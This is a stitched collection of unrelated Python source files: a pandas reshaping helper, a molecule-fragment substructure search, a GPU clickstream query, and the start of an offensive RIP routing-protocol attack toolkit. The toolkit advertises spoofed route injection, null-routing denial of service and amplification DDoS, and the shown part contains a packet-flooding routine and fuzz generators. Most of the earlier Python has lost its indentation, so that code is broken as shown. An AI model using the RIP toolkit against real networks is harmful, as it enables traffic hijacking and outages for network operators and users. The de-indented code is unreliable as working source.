        df: 0-1 normalized data (globally normalized), with Gene names, Protein IDs, Compartment as columns
Pattern for Column data: Exp_Map_Fraction
"""
for exp_name in json_dict.keys():
for data_type in json_dict[exp_name].keys():
if data_type == "0/1 normalized data" and exp_name == list(json_dict.keys())[0]:
df_01_combined = pd.read_json(json_dict[exp_name][data_type])
df_01_combined = df_01_combined.set_index(["Gene names", "Protein IDs", "Compartment"]).copy()
                df_01_combined = df_01_combined.drop([col for col in df_01_combined.columns if not col.startswith("normalized profile")], axis=1)
df_01_combined.columns = pd.MultiIndex.from_tuples([el.split("?") for el in df_01_combined.columns], names=["Set", "Map", "Fraction"])
df_01_combined.rename(columns = {"normalized profile":exp_name}, inplace=True)
elif data_type == "0/1 normalized data" and exp_name != list(json_dict.keys())[0]:
df_01_toadd = pd.read_json(json_dict[exp_name][data_type])
df_01_toadd = df_01_toadd.set_index(["Gene names", "Protein IDs", "Compartment"]).copy()
                df_01_toadd = df_01_toadd.drop([col for col in df_01_toadd.columns if not col.startswith("normalized profile")], axis=1)
df_01_toadd.columns = pd.MultiIndex.from_tuples([el.split("?") for el in df_01_toadd.columns], names=["Set", "Map", "Fraction"])
df_01_toadd.rename(columns = {"normalized profile":exp_name}, inplace=True)
df_01_combined = pd.concat([df_01_combined, df_01_toadd], axis=1)
df_01_combined.columns.names = ["Experiment", "Map", "Fraction"]
df = df_01_combined.stack(["Experiment", "Map"]).dropna(axis=0)
df = df.div(df.sum(axis=1), axis=0)
index_ExpMap = df.index.get_level_values("Experiment")+"_"+df.index.get_level_values("Map")
index_ExpMap.name = "Exp_Map"
df.set_index(index_ExpMap, append=True, inplace=True)
df.index = df.index.droplevel(["Map", "Experiment"])
df = df.stack("Fraction").unstack(["Exp_Map", "Fraction"])
df.columns = ["_".join(col) for col in df.columns.values]
return df
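# Hypothetical usage (the json file name is a placeholder; json_dict is the dictionary uploaded in the
# manage dataset tab, as described in the docstring above):
#   import json
#   with open("analysed_datasets.json") as fh:
#       json_dict = json.load(fh)
#   df_perseus = reframe_df_01_fromJson_for_Perseus(json_dict)
#   df_perseus.to_csv("perseus_input.tsv", sep="\t")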
|
the-stack_0_12347 |
from src.smiles_to_structure import convert_to_structure, MoleculeStructure, Fragment
from collections import Counter
from termcolor import cprint
from src.fragments_library import special_cases, biomolecules, peptide_amino_acids, heterocycles, \
common_aromatic_heterocycles, generalized_heterocycles, arenes, functional_groups, hydrocarbons, aromatic_fragments
'''The find_fragment method allows a substructure search of a given chemical fragment within a molecule
(subgraph isomorphism). Takes the fragment SMILES string, the molecule SMILES string, and a fragment name as inputs.
The fragmentize method allows a library of fragments to be searched for within a molecule via the find_fragment method.
Takes the SMILES string of a molecule and fragment libraries as *args as inputs.
The fragment library should be ordered hierarchically, with more complex fragments being searched first. Atoms found in
any given substructure search are marked as discovered and are not used in further substructure searches (unless
specified as "phantom atoms", see fragments_library).
The method will return a list of names of the fragments found and the labeled molecular structure as a tuple
-> (fragment_names_list, labeled_structure)
If numeric=True, will return a vector with the count of the number of each fragment found and the labeled molecular
structure as a tuple
-> (fragment_vector, labeled_structure)
'''
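# Example call (illustrative only; the SMILES string is arbitrary and the library order mirrors the
# imports above, most complex fragments first):
#
#   fragment_names, labeled_structure = fragmentize(
#       "CC(=O)Oc1ccccc1C(=O)O",
#       special_cases, biomolecules, peptide_amino_acids, heterocycles,
#       common_aromatic_heterocycles, generalized_heterocycles, arenes,
#       functional_groups, hydrocarbons, aromatic_fragments,
#   )
#
# With numeric=True the same call returns a count vector instead of the list of fragment names.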
class AtomData:
def __init__(self, symbol):
self.symbol = symbol
self.bond = None
self.daughter_branches = []
self.ring_closures = set()
self.phantom_bonds = None
self.phantom_atom = False
class Branch:
def __init__(self, bond):
self.bond = bond
self.sequence = []
def abbr_bond(bond):
return bond.bond_code, bond.atom.symbol
# bond_atom_info is the atom_info of the atom for the bond being checked (to see if it's a phantom bond/discovered)
def check_bond(bond, map_bond, bond_atom_info):
# if the bond.atom is discovered already, it should give back false (can't retread over discovered atoms)
# unless the atom_info for that atom shows that the bond.atom should be a phantom atom (which can be searched for in discovered atoms)
if bond.atom.discovered:
if not bond_atom_info.phantom_atom:
return False
if abbr_bond(bond) == map_bond:
return True
# need to cover (correct, R) (correct, Q) (9, R) (9, Q) (9, correct)
elif bond.bond_code == map_bond[0] or map_bond[0] == 9: # covers (correct, R) (correct, Q) (9, R) (9, Q)
if map_bond[1] == "R":
return True
elif map_bond[1] == "Q" and bond.atom.heteroatom:
return True
elif bond.atom.symbol == map_bond[1]:
if map_bond[0] == 9:
return True
else:
return False
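# Wildcard semantics implemented by check_bond above: a map_bond bond code of 9 matches any bond order,
# a map_bond symbol of "R" matches any atom and "Q" matches any heteroatom, so e.g. (9, "R") accepts any
# undiscovered neighbour while (9, "C") accepts any bond order to a carbon.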
def calc_branch_length(branch):
branch_length = 0
def add_daughter_branch_length(daughter_branch):
nonlocal branch_length
branch_length += len(daughter_branch.sequence)
if len(daughter_branch.sequence[-1].daughter_branches) > 0:
for b in daughter_branch.sequence[-1].daughter_branches:
add_daughter_branch_length(b)
add_daughter_branch_length(branch)
return branch_length
def find_fragment(fragment_string, molecule_string, fragment_name, structure=None, verbose=False):
verbose_bin = []
if structure:
molecule_structure = structure
else:
molecule_structure = convert_to_structure(MoleculeStructure(), molecule_string)
fragment_structure = convert_to_structure(MoleculeStructure(), fragment_string)
def find_anchor_atom(fragment):
for ele in ["Si", "P", "p", "S", "s", "I", "Br", "Cl", "F", "B", "b", "O", "o", "N", "n", "C", "c", "R"]:
for atom in fragment.atom_list:
if atom.symbol == ele:
return atom
fragment_anchor_atom = find_anchor_atom(fragment_structure)
# the actual atom object of highest priority in the fragment structure
def is_potential_anchor(atom, fragment_anchor_atom, atom_list):
# searches through all atoms in molecules in total_molecule to see if they match the fragment base atom
# atom -> current atom its checking
# atom_list is list where potential anchor atoms are stored
# fragment_anchor_atom is the actual atom object from the fragment structure
if atom.discovered and not fragment_anchor_atom.phantom_atom: # if fragment_anchor atom is a phantom atom, it can use discovered atoms as potential anchors
return
# atom has already been used to find a fragment
if atom.symbol != fragment_anchor_atom.symbol and fragment_anchor_atom.symbol != 'R': # TODO what about if anchor atom is Q!??
return
# check to see if atom is the same element
fragment_anchor_atom_bonds = Counter([abbr_bond(bond) for bond in fragment_anchor_atom.bonded_to])
# count bonds from anchor atom
atom_bonds = Counter([abbr_bond(bond) for bond in atom.bonded_to])
# count bonds in potential anchor atom where the bond's atom haven't been discovered yet (as we won't be able to use those bonds)
for key in fragment_anchor_atom_bonds:
if key[1] != "R" and key[1] != "Q" and key[0] != 9: # TODO better way to do this???
if key not in atom_bonds or fragment_anchor_atom_bonds[key] > atom_bonds[key]:
# check 1: are there bonds types in fragment base atom that current atom doesn't have
# check 2: does current atom have >= the amount of each bond type compared to fragment base atom
# i.e. are the bonds in fragment anchor atom a subset of the bonds of current atom
return
atom_list.append(atom)
# if all checks passed, atom is a potential base atom and is stored in a list
potential_anchor_atoms = []
# keeping track of atoms that match fragment base atom
for atom in molecule_structure.atom_list:
is_potential_anchor(atom, fragment_anchor_atom, potential_anchor_atoms)
if potential_anchor_atoms == []:
verbose_bin.append("no anchor atoms found")
return 0
else:
verbose_bin.append("potential anchor atoms: ")
for atom in potential_anchor_atoms:
verbose_bin.append(atom.symbol)
for bond in atom.bonded_to:
verbose_bin.append(abbr_bond(bond))
def map_fragment(fragment, anchor_atom):
visited = {}
for atom in fragment.atom_list:
visited[atom] = False
# keeps track of which atoms have been visited
atom_info_dict = {}
# links the molecule_atom and the atom_info representing that atom, used to pass ring_closure info to map
ring_closure_counter = 1
def traverse(current_atom, previous_atom, current_branch):
visited[current_atom] = True
current_atom_data = AtomData(current_atom.symbol)
# data object for current atom
# atom_data will reflect that the atom is a phantom_atom
if current_atom.phantom_atom:
current_atom_data.phantom_atom = True
atom_info_dict[current_atom] = current_atom_data
if current_branch:
current_branch.sequence.append(current_atom_data)
# append atom info to branch sequence
# if current_branch b/c first atom does not have a branch
current_atom_data.phantom_bonds = current_atom.phantom_bonds
unchecked_bonds = [bond for bond in current_atom.bonded_to if bond.atom != previous_atom]
nonlocal ring_closure_counter
# if more than 1 unchecked bonds (i.e. a branch point), create new branch for each unchecked bond
if len(unchecked_bonds) > 1:
for bond in unchecked_bonds:
if not visited[bond.atom]:
verbose_bin.append("new branch")
new_branch(bond.atom, current_atom, current_atom_data, bond.bond_code)
elif not bool(current_atom_data.ring_closures & atom_info_dict[bond.atom].ring_closures):
# if visited[bond.atom], we are at a ring closure
# this bool sees if the atom_info of these two atoms (current atom and the atom its bonded to) share any values (& operator)
# if they do, this ring closure has already been documented and we don't want to double count it
verbose_bin.append("ring closure")
current_atom_data.ring_closures.add((ring_closure_counter, bond.bond_code))
atom_info_dict[bond.atom].ring_closures.add((ring_closure_counter, bond.bond_code))
# add matching values to each atom_info.ring_closure
# ring closure data in format (ring closure #, bond_code)
ring_closure_counter += 1
# if a contiguous section of branch, add bond info
elif len(unchecked_bonds) == 1:
if current_branch:
if not visited[unchecked_bonds[0].atom]:
verbose_bin.append("continue branch")
current_atom_data.bond = abbr_bond(unchecked_bonds[0])
traverse(unchecked_bonds[0].atom, current_atom, current_branch)
elif not bool(current_atom_data.ring_closures & atom_info_dict[unchecked_bonds[0].atom].ring_closures):
verbose_bin.append("ring closure")
current_atom_data.ring_closures.add((ring_closure_counter, unchecked_bonds[0].bond_code))
atom_info_dict[unchecked_bonds[0].atom].ring_closures.add((ring_closure_counter, unchecked_bonds[0].bond_code))
ring_closure_counter += 1
# same as above
else:
verbose_bin.append("new branch")
for bond in unchecked_bonds:
new_branch(bond.atom, current_atom, current_atom_data, bond.bond_code)
# if the anchor atom only has 1 bond, need to start a branch
else:
verbose_bin.append("end point")
if not current_branch:
return current_atom_data
            # this returns anchor atom to the map_fragment function as the anchor atom is not spawned from a branch
def new_branch(current_atom, previous_atom, previous_atom_data, bond_code):
current_branch = Branch((bond_code, current_atom.symbol))
# create new branch with bonding info to first atom in branch
previous_atom_data.daughter_branches.append(current_branch)
# add new branch to the atom which spawned it
traverse(current_atom, previous_atom, current_branch)
# start traverse on first atom in branch
# need to pass previous_atom in order to not travel backwards
return traverse(anchor_atom, None, None)
# starts process of mapping fragment, but also returns the anchor atom
anchored_fragment_map = map_fragment(fragment_structure, fragment_anchor_atom)
# the map base is the atom_data representation of the anchor atom
# the rest of the map is stored in the daughter branches
def expand_map(anchor_atom):
verbose_bin.append("anchor atom")
verbose_bin.append(anchor_atom.symbol)
if len(anchor_atom.ring_closures) > 0:
verbose_bin.append("ring closures:")
for num in anchor_atom.ring_closures:
verbose_bin.append(num)
if anchor_atom.phantom_bonds:
verbose_bin.append(f"phantom bonds = {anchor_atom.phantom_bonds}")
def expand_branch_point(atom_map):
for branch in atom_map.daughter_branches:
verbose_bin.append("branch:")
verbose_bin.append(f"branch length: {len(branch.sequence)}")
verbose_bin.append(f"total branch length: {calc_branch_length(branch)}")
verbose_bin.append(f"bond to branch: {branch.bond}")
for atom_info in branch.sequence:
verbose_bin.append(atom_info.symbol)
if len(atom_info.ring_closures) > 0:
verbose_bin.append("ring closures:")
for num in atom_info.ring_closures:
verbose_bin.append(num)
if atom_info.phantom_bonds:
verbose_bin.append(f"phantom bonds = {atom_info.phantom_bonds}")
if atom_info.bond:
verbose_bin.append(atom_info.bond)
if len(atom_info.daughter_branches) > 0:
verbose_bin.append("branch point")
expand_branch_point(atom_info)
expand_branch_point(anchor_atom)
verbose_bin.append("\nexpanded map:\n")
expand_map(anchored_fragment_map)
def check_anchor_atom(potential_anchor_atom, fragment_map):
molecule_atoms = {potential_anchor_atom}
# list to keep track of which atoms in the molecule constitute a matched fragment
currently_visited = {potential_anchor_atom: fragment_map}
# dictionary that keeps track of which atoms have been used to find the fragment at any given step
def check_branch_point(current_molecule_atom, previous_molecule_atom, map_atom_info, branch_atoms):
if map_atom_info.phantom_bonds:
bond_num = len(current_molecule_atom.bonded_to)
if bond_num != map_atom_info.phantom_bonds:
verbose_bin.append("wrong amount of phantom bonds")
return False
# phantom_bonds is a way to ensure the current atom is bonded to the specified number of atoms
# note that phantom bonds includes any bonds for the current molecule_atom, including those to atoms that are "discovered"
branch_point_atoms = set()
nonlocal currently_visited
verbose_bin.append("I'm trying a branch point")
map_atom_info.daughter_branches.sort(key=calc_branch_length, reverse=True)
# this makes longer branches go first -> have to search the longest branch first
# otherwise a shorter branch might be identified in what is actually the long branch
# i.e. if atom has ethyl and propyl group, you could find the ethyl group where the propyl group is and then be unable to find propyl group
            # also important - need to calculate the total branch length (including length of all its daughter branches)
verbose_bin.append("branch point bonds check")
unchecked_bonds = Counter([abbr_bond(bond) for bond in current_molecule_atom.bonded_to if bond.atom != previous_molecule_atom])
fragment_branch_point_bonds = Counter([branch.bond for branch in map_atom_info.daughter_branches])
verbose_bin.append(unchecked_bonds)
verbose_bin.append(fragment_branch_point_bonds)
# subset check on branch point, just to make sure current atom has all the bonds the fragment branchpoint has
for key in fragment_branch_point_bonds:
if key[1] != "R" and key[1] != "Q" and key[0] != 9: # TODO better way to do this?
if key not in unchecked_bonds or fragment_branch_point_bonds[key] > unchecked_bonds[key]:
verbose_bin.append("branch point doesn't contain necessary bonds")
return False
branch_check = {}
for branch in map_atom_info.daughter_branches:
branch_check[branch] = False
# set all branches to unconfirmed
trial_paths = [bond for bond in current_molecule_atom.bonded_to if bond.atom != previous_molecule_atom]
# available routes to see if branch matches
checked_paths = []
# keeps track of bonds that have been used to successfully identify branches
for branch in map_atom_info.daughter_branches:
# take each branch
for bond in trial_paths:
if check_bond(bond, branch.bond, branch.sequence[0]) and bond not in checked_paths and bond.atom not in currently_visited:
# if the bond to the branch matches the current bond (and the current bond hasn't already been used to identify a branch):
if try_branch(branch.sequence, bond.atom, current_molecule_atom, branch_point_atoms):
# test to see if the current branch works on this bond path
verbose_bin.append("branch successful")
branch_check[branch] = True
checked_paths.append(bond)
# if true, the branch was successfully found, turn branch to True in branch check
# add bond used to checked_paths so it isn't used for further branches
break
# need to stop the for loop so it doesn't search the matched branch in further trial_paths
else:
verbose_bin.append("branch not successful")
if all(value is True for value in branch_check.values()):
verbose_bin.append("branch point match")
if branch_atoms:
branch_atoms.update(branch_point_atoms)
else:
molecule_atoms.update(branch_point_atoms)
# first branch point does not have a branch that spawned it
return True
# if all branches have been found, they will be True in branch_check, branch point is a match, return True
else:
verbose_bin.append("branch point not matched")
return False
# one or more branches were found, branch point wasn't a match, return False
def try_branch(branch_sequence, current_molecule_atom, previous_molecule_atom, branch_point_atoms):
branch_atoms = set()
verbose_bin.append("I'm trying a branch!")
if check_atom_bonds(current_molecule_atom, previous_molecule_atom, branch_sequence, 0, branch_atoms):
branch_point_atoms.update(branch_atoms)
# add branch_atoms to branch point_atoms
return True
else:
nonlocal currently_visited
for a in branch_atoms:
currently_visited.pop(a)
def check_ring_closure(current_atom, atom_info): # already check if atom_info has ring closure
ring_closures = set() # all the ring closure numbers in currently_visited
for value in currently_visited.values():
ring_closures.update(value.ring_closures)
for closure_info in atom_info.ring_closures: # checking each ring closure atom has
verbose_bin.append("ring closure")
verbose_bin.append(closure_info)
if closure_info in ring_closures: # we've already hit the other half of the ring closure
for key in currently_visited: # looking for matching ring closure
if closure_info in currently_visited[key].ring_closures: # matched ring closure, key = atom it should be bonded to
ring_closure_partner = key
if ring_closure_partner in [bond.atom for bond in current_atom.bonded_to]:
ring_closure_bond = None
for bond in current_atom.bonded_to:
if bond.atom == ring_closure_partner:
ring_closure_bond = bond
if ring_closure_bond.bond_code != closure_info[1] and closure_info[1] != 9:
verbose_bin.append("closure bond incorrect")
return False
else:
verbose_bin.append("atom not bonded to correct closure partner")
return False
else:
return True
# first time encountering that ring closure number, don't need to do any further checks
verbose_bin.append("all ring closures acounted for")
return True
def check_atom_bonds(current_molecule_atom, previous_molecule_atom, branch_sequence, index, branch_atoms):
verbose_bin.append("checking atom")
verbose_bin.append(current_molecule_atom.symbol)
nonlocal currently_visited
current_atom_info = branch_sequence[index]
if current_atom_info.phantom_bonds:
bond_num = len(current_molecule_atom.bonded_to)
if bond_num != current_atom_info.phantom_bonds:
verbose_bin.append("wrong amount of phantom bonds")
return False
if current_atom_info.ring_closures:
if not check_ring_closure(current_molecule_atom, current_atom_info):
return False
currently_visited[current_molecule_atom] = current_atom_info
for a in currently_visited:
verbose_bin.append(a.symbol)
if currently_visited[a].ring_closures:
verbose_bin.append(currently_visited[a].ring_closures)
verbose_bin.append("\n")
branch_atoms.add(current_molecule_atom)
if len(current_atom_info.daughter_branches) > 0:
# atom is branch point and need to check branches
return check_branch_point(current_molecule_atom, previous_molecule_atom, current_atom_info, branch_atoms)
else:
# atom is either an endpoint or contiguous segment:
if not current_atom_info.bond:
verbose_bin.append("reached branch end")
# if no bond data, means we have matched the entire branch, return True
return True
else:
# else: this is a contiguous segment look for appropriate bonds
unchecked_bonds = [bond for bond in current_molecule_atom.bonded_to if bond.atom != previous_molecule_atom]
if len(unchecked_bonds) == 0:
verbose_bin.append("branch ended too early")
# actual branch has ended, but map says there should be another atom bonded here, therefore return False
return False
elif len(unchecked_bonds) == 1:
# actual molecule only has a contiguous segment here
verbose_bin.append(current_atom_info.bond)
verbose_bin.append(abbr_bond(unchecked_bonds[0]))
if check_bond(unchecked_bonds[0], current_atom_info.bond, branch_sequence[index + 1]) and unchecked_bonds[0].atom not in currently_visited:
return check_atom_bonds(unchecked_bonds[0].atom, current_molecule_atom, branch_sequence, index + 1, branch_atoms) # check next atom
# all branches should either return a function, True, or False. All child functions should do the same
# uncheck_bonds[0].atom becomes new current_molecule_atom, current_molecule_atom becomes previous_molecule_atom
# also pass the branch sequence and the index of the next atom_info in the branch
else:
verbose_bin.append("wrong bond or already visited")
return False
# the next atom in the branch either has the wrong bond or atom symbol
else:
# there are multiple possible paths branch could go
verbose_bin.append("checking multiple paths for branch")
# check all ways
for bond in unchecked_bonds:
if current_atom_info.bond != abbr_bond(bond): # this is purely for seeing what's happening
verbose_bin.append(abbr_bond(bond))
verbose_bin.append(current_atom_info.bond)
if check_bond(bond, current_atom_info.bond, branch_sequence[index + 1]) and bond.atom not in currently_visited:
verbose_bin.append(abbr_bond(bond))
verbose_bin.append(current_atom_info.bond)
# looks at all possible ways that match the correct bond
midway_fork = set()
# need to separate the branch_atoms here since we don't know if any of the paths will work
if check_atom_bonds(bond.atom, current_molecule_atom, branch_sequence, index + 1, midway_fork):
branch_atoms.update(midway_fork)
# if one of the paths works, add all the atoms from the midway_fork "branch"
return True
# return True if any of the paths work (also returns first found)
else:
for a in midway_fork:
currently_visited.pop(a)
# if midway_fork doesn't work, need to remove those atoms from currently_visited
return False
# if this else clause didn't return True (i.e. none of the paths succeeded)
# then none of the paths are productive, return false
if check_branch_point(potential_anchor_atom, None, fragment_map, None):
verbose_bin.append("phantom atom check")
for atom in currently_visited:
if not currently_visited[atom].phantom_atom:
# using currently visited to see if the atom_data that was used to find that atom was marked as a phantom_atom
# if it is a phantom atom, don't mark as discovered
atom.discovered = True
else:
verbose_bin.append("this atom should not be counted")
# running checks
verbose_bin.append(f"number of atoms in fragment: {len(molecule_atoms)}")
molecule_atoms2 = [atom.symbol for atom in molecule_atoms]
molecule_atoms2phantom = [atom.phantom_atom for atom in molecule_atoms]
if (len(molecule_atoms)) != len(currently_visited):
verbose_bin.append("error in number of atoms found")
for atom in molecule_atoms:
if atom not in currently_visited:
verbose_bin.append("error: descrepancy between currently_visited and molecule_atoms")
for atom in molecule_atoms:
verbose_bin.append(atom.symbol)
verbose_bin.append("matched fragment to anchor atom")
return Fragment(fragment_name, list(molecule_atoms)) # TODO currently this includes atoms that were found via phantom atoms (unclear if this is wanted behavior)
else:
verbose_bin.append("anchor atom not matched to fragment")
return False
# start from check_branch point on the potential anchor atom
# the anchor atom in map is treated as a branch point, even if it only has 1 branch
fragment_counter = 0
fragments_identified = []
for atom in potential_anchor_atoms:
verbose_bin.append("checking anchor atom")
for bond in atom.bonded_to:
verbose_bin.append(abbr_bond(bond))
is_found_fragment = check_anchor_atom(atom, anchored_fragment_map)
if is_found_fragment:
# add atoms found to fragment
fragment_counter += 1
fragments_identified.append(is_found_fragment)
verbose_bin.append(f"\nnumber of fragments found: {fragment_counter}")
if verbose:
for item in verbose_bin:
print(item)
return fragments_identified
def fragmentize(molecule_string, *fragment_libraries, numeric=False, verbose=False):
molecule_structure = convert_to_structure(MoleculeStructure(), molecule_string)
fragments = []
fragment_names = []
fragments_counter = []
generalized_heterocycles_found = []
for lib in fragment_libraries:
if lib != generalized_heterocycles:
for frag in lib:
frag_num = 0
for frag_res_structure in lib[frag]:
frag_res_found = find_fragment(frag_res_structure, None, frag, structure=molecule_structure, verbose=verbose)
if frag_res_found:
frag_num += len(frag_res_found)
# can find multiples of a fragment
for f in frag_res_found:
fragments.append(f)
fragment_names.append(f.name)
fragments_counter.append(frag_num)
# for generalized heterocycles
else:
for frag in lib:
for frag_res_structure in lib[frag]:
frag_res_found = find_fragment(frag_res_structure, None, frag, structure=molecule_structure, verbose=verbose)
if frag_res_found:
for f in frag_res_found:
f.generalize_heterocycle_name()
generalized_heterocycles_found.append(f)
# possible varieties of generalized heterocycles
# name format: X-Y+ZM-het where X is number of heteroatoms, Y is the number of atoms in the ring and
# Z is the number of atoms in the fused ring
generalized_heterocycles_names = ["0-5M-het", "1-5M-het", "2-5M-het", "3-5M-het", "4-5M-het",
"0-6M-het", "1-6M-het", "2-6M-het", "3-6M-het", "4-6M-het",
"0-6+5M-het", "1-6+5M-het", "2-6+5M-het", "3-6+5M-het", "4-6+5M-het", "5-6+5M-het", "6-6+5M-het",
"0-6+6M-het", "1-6+6M-het", "2-6+6M-het", "3-6+6M-het", "4-6+6M-het", "5-6+6M-het", "6-6+6M-het"]
generalized_heterocycles_found_dict = {k:0 for k in generalized_heterocycles_names}
for heterocycle in generalized_heterocycles_found:
generalized_heterocycles_found_dict[heterocycle.name] += 1
fragments.append(heterocycle)
fragment_names.append(heterocycle.name)
for key in generalized_heterocycles_found_dict:
fragments_counter.append(generalized_heterocycles_found_dict[key])
molecule_structure.fragments_list = fragments
atoms_not_discovered = 0
for atom in molecule_structure.atom_list:
if not atom.discovered:
atoms_not_discovered += 1
if atoms_not_discovered > 0:
# total_frags = 0
# for lib in fragment_libraries:
# total_frags += len(lib)
cprint(f"atoms not found: {atoms_not_discovered}", "red")
cprint(molecule_string, 'red')
# return ["NA" for _ in range(total_frags)]
if numeric:
return fragments_counter, molecule_structure
else:
return fragment_names, molecule_structure
|
the-stack_0_12348 | #
# Copyright (c) 2019-2022, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import cudf
from numba import cuda
from bdb_tools.readers import build_reader
q03_days_in_sec_before_purchase = 864000
q03_views_before_purchase = 5
q03_purchased_item_IN = 10001
q03_purchased_item_category_IN = 2, 3
q03_limit = 100
def read_tables(config, c=None):
table_reader = build_reader(
data_format=config["file_format"],
basepath=config["data_dir"],
split_row_groups=config["split_row_groups"],
)
item_cols = ["i_category_id", "i_item_sk"]
wcs_cols = [
"wcs_user_sk",
"wcs_click_time_sk",
"wcs_click_date_sk",
"wcs_item_sk",
"wcs_sales_sk",
]
item_df = table_reader.read("item", relevant_cols=item_cols)
wcs_df = table_reader.read("web_clickstreams", relevant_cols=wcs_cols)
if c:
c.create_table("web_clickstreams", wcs_df, persist=False)
c.create_table("item", item_df, persist=False)
return item_df
@cuda.jit
def find_items_viewed_before_purchase_kernel(
relevant_idx_col, user_col, timestamp_col, item_col, out_col, N
):
"""
    Find the N items viewed before a relevant purchase was made,
as defined by the configuration of this query.
"""
i = cuda.grid(1)
if i < (relevant_idx_col.size): # boundary guard
# every relevant row gets N rows in the output, so we need to map the indexes
# back into their position in the original array
orig_idx = relevant_idx_col[i]
current_user = user_col[orig_idx]
# look at the previous N clicks (assume sorted descending)
rows_to_check = N
remaining_rows = user_col.size - orig_idx
if remaining_rows <= rows_to_check:
rows_to_check = remaining_rows - 1
for k in range(1, rows_to_check + 1):
if current_user != user_col[orig_idx + k]:
out_col[i * N + k - 1] = 0
# only checking relevant purchases via the relevant_idx_col
elif (timestamp_col[orig_idx + k] <= timestamp_col[orig_idx]) & (
timestamp_col[orig_idx + k]
>= (timestamp_col[orig_idx] - q03_days_in_sec_before_purchase)
):
out_col[i * N + k - 1] = item_col[orig_idx + k]
else:
out_col[i * N + k - 1] = 0
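# Worked example of the output layout (hypothetical values, N = 3): if relevant_idx_col == [4] and the
# clickstream is sorted descending by time, the kernel inspects rows 5, 6 and 7 of user_col/timestamp_col
# and writes the qualifying item_sks (or 0) into out_col[0], out_col[1], out_col[2], i.e. slots i*N + k - 1.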
def apply_find_items_viewed(df, item_mappings):
# need to sort descending to ensure that the
# next N rows are the previous N clicks
df = df.sort_values(
by=["wcs_user_sk", "tstamp", "wcs_sales_sk", "wcs_item_sk"],
ascending=[False, False, False, False],
)
df.reset_index(drop=True, inplace=True)
df["relevant_flag"] = (df.wcs_sales_sk != 0) & (
df.wcs_item_sk == q03_purchased_item_IN
)
df["relevant_idx_pos"] = df.index.to_series()
df.reset_index(drop=True, inplace=True)
# only allocate output for the relevant rows
sample = df.loc[df.relevant_flag == True]
sample.reset_index(drop=True, inplace=True)
N = q03_views_before_purchase
size = len(sample)
# we know this can be int32, since it's going to contain item_sks
out_arr = cuda.device_array(size * N, dtype=df["wcs_item_sk"].dtype)
find_items_viewed_before_purchase_kernel.forall(size)(
sample["relevant_idx_pos"],
df["wcs_user_sk"],
df["tstamp"],
df["wcs_item_sk"],
out_arr,
N,
)
result = cudf.DataFrame({"prior_item_viewed": out_arr})
del out_arr
del df
del sample
filtered = result.merge(
item_mappings,
how="inner",
left_on=["prior_item_viewed"],
right_on=["i_item_sk"],
)
return filtered
|
the-stack_0_12349 | #!/usr/bin/python
#
# Currently implemented attacks:
# - sniffer - (NOT YET IMPLEMENTED) Sniffer hunting for authentication strings
# - ripv1-route - Spoofed RIPv1 Route Announcements
# - ripv1-dos - RIPv1 Denial of Service via Null-Routing
# - ripv1-ampl - RIPv1 Reflection Amplification DDoS
# - ripv2-route - Spoofed RIPv2 Route Announcements
# - ripv2-dos - RIPv2 Denial of Service via Null-Routing
# - rip-fuzzer - RIPv1/RIPv2 protocol fuzzer, covering RIPAuth and RIPEntry structures fuzzing
#
# Python requirements:
# - scapy
#
# Mariusz B. / mgeeky, '19, <[email protected]>
#
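# Example invocation (illustrative only; the script name, interface and all addresses below are placeholders):
#   python2 rip-toolkit.py -t ripv2-route -i eth0 -s 192.168.1.66 -a 10.0.0.0 -b 255.255.255.0 -c 192.168.1.66 -m 1
#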
import sys
import socket
import fcntl
import struct
import string
import random
import commands
import argparse
import multiprocessing
import time
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.1'
config = {
'verbose' : False,
'debug' : False,
'delay' : 1.0,
'interface': None,
'processors' : 8,
'network': '',
'spoof': '',
'nexthop': '',
'netmask': '',
'metric': 0,
'auth-type': '',
'auth-data': '',
}
attacks = {}
stopThreads = False
#
# ===============================================
#
def flooder(num, packets):
Logger.dbg('Starting task: {}, packets num: {}'.format(num, len(packets)))
for p in packets:
if stopThreads: break
try:
if stopThreads:
raise KeyboardInterrupt
sendp(p, verbose = False)
if len(p) < 1500:
Logger.dbg("Sent: \n" + str(p))
except KeyboardInterrupt:
break
except Exception as e:
pass
Logger.dbg('Stopping task: {}'.format(num))
class Logger:
@staticmethod
def _out(x):
if config['verbose'] or config['debug']:
sys.stdout.write(x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[.] ' + x)
@staticmethod
def dbg(x):
if config['debug']:
Logger._out('[dbg] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
# Well, not a very fuzzy fuzzer, I know.
class Fuzzer:
@staticmethod
def get8bitFuzzes():
out = set()
for i in range(9):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**8]
@staticmethod
def get16bitFuzzes():
out = set()
for i in range(17):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**16]
@staticmethod
def get32bitFuzzes():
out = set()
for i in range(33):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**32]
@staticmethod
def deBrujinPattern(length):
if length == 0: return ''
if length >= 20280:
out = ''
out += Fuzzer.deBrujinPattern(20280 - 1)
out += "A" * (length - 20280 - 1)
return out
pattern = ''
for upper in string.ascii_uppercase:
for lower in string.ascii_lowercase:
for digit in string.digits:
if len(pattern) < length:
pattern += upper + lower + digit
else:
out = pattern[:length]
return out
return pattern
@staticmethod
def getFuzzyStrings(maxLen = -1, allOfThem = True):
out = set()
for b in Fuzzer.get16bitFuzzes():
out.add(Fuzzer.deBrujinPattern(b))
if allOfThem:
for b in range(0, 65400, 256):
if maxLen != -1 and b > maxLen: break
out.add(Fuzzer.deBrujinPattern(b))
if maxLen != -1:
